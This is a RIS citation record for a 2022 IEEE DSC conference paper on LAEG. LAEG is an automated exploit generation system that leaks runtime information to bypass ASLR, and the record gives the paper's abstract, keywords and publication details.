TY - GEN
T1 - LAEG
T2 - 5th IEEE Conference on Dependable and Secure Computing, DSC 2022
AU - Mow, Wei Loon
AU - Huang, Shih Kun
AU - Hsiao, Hsu Chun
N1 - Publisher Copyright:
© 2022 IEEE.
PY - 2022
Y1 - 2022
N2 - Address space layout randomization (ASLR) is a binary protection technique that randomizes a binary's loaded base addresses in every execution. It hardens binaries against exploitation by preventing attackers from reusing identified resources (e.g., code gadgets or stack buffers found at specific memory locations) in subsequent executions. As most modern compilers and operating systems enable ASLR by default, an effective automated exploit generation (AEG) system should be resilient to ASLR when constructing exploits. However, previ-ously proposed AEG systems either assume the absence of ASLR or only bypass it under limited circumstances, and thus cannot reliably exploit binaries running on modern operating systems. With the aim of improving AEG's practicality by developing an ASLR-resilient AEG system, we designed and implemented leak-based AEG (LAEG), a system that can recover randomized base addresses by leaking additional information at runtime. Specifically, given a proof-of-crash input, LAEG uses dynamic taint analysis to analyze the black-box binary, and identifies the input and output states relevant to the base address information. By doing so, LAEG can efficiently recover base addresses from uninitialized buffers and use them to construct an exploit that is resilient to ASLR. Moreover, our tests established that LAEG could successfully construct exploits that bypass state-of-the-art types of binary protection, including not only ASLR but PIE, NX, and stack canary. Besides that, LAEG exhibited better performance than an open-source AEG solution, Zeratool; and was between 6.46x and 45.15x faster at exploit generation than human experts were.
AB - Address space layout randomization (ASLR) is a binary protection technique that randomizes a binary's loaded base addresses in every execution. It hardens binaries against exploitation by preventing attackers from reusing identified resources (e.g., code gadgets or stack buffers found at specific memory locations) in subsequent executions. As most modern compilers and operating systems enable ASLR by default, an effective automated exploit generation (AEG) system should be resilient to ASLR when constructing exploits. However, previ-ously proposed AEG systems either assume the absence of ASLR or only bypass it under limited circumstances, and thus cannot reliably exploit binaries running on modern operating systems. With the aim of improving AEG's practicality by developing an ASLR-resilient AEG system, we designed and implemented leak-based AEG (LAEG), a system that can recover randomized base addresses by leaking additional information at runtime. Specifically, given a proof-of-crash input, LAEG uses dynamic taint analysis to analyze the black-box binary, and identifies the input and output states relevant to the base address information. By doing so, LAEG can efficiently recover base addresses from uninitialized buffers and use them to construct an exploit that is resilient to ASLR. Moreover, our tests established that LAEG could successfully construct exploits that bypass state-of-the-art types of binary protection, including not only ASLR but PIE, NX, and stack canary. Besides that, LAEG exhibited better performance than an open-source AEG solution, Zeratool; and was between 6.46x and 45.15x faster at exploit generation than human experts were.
KW - Address Space Layout Randomization
KW - Automated Exploit Generation
KW - Dynamic Taint Analysis
UR - http://www.scopus.com/inward/record.url?scp=85141055686&partnerID=8YFLogxK
U2 - 10.1109/DSC54232.2022.9888796
DO - 10.1109/DSC54232.2022.9888796
M3 - Conference contribution
AN - SCOPUS:85141055686
T3 - 5th IEEE Conference on Dependable and Secure Computing, DSC 2022 and SECSOC 2022 Workshop, PASS4IoT 2022 Workshop SICSA International Paper/Poster Competition in Cybersecurity
BT - 5th IEEE Conference on Dependable and Secure Computing, DSC 2022 and SECSOC 2022 Workshop, PASS4IoT 2022 Workshop SICSA International Paper/Poster Competition in Cybersecurity
PB - Institute of Electrical and Electronics Engineers Inc.
Y2 - 22 June 2022 through 24 June 2022
ER -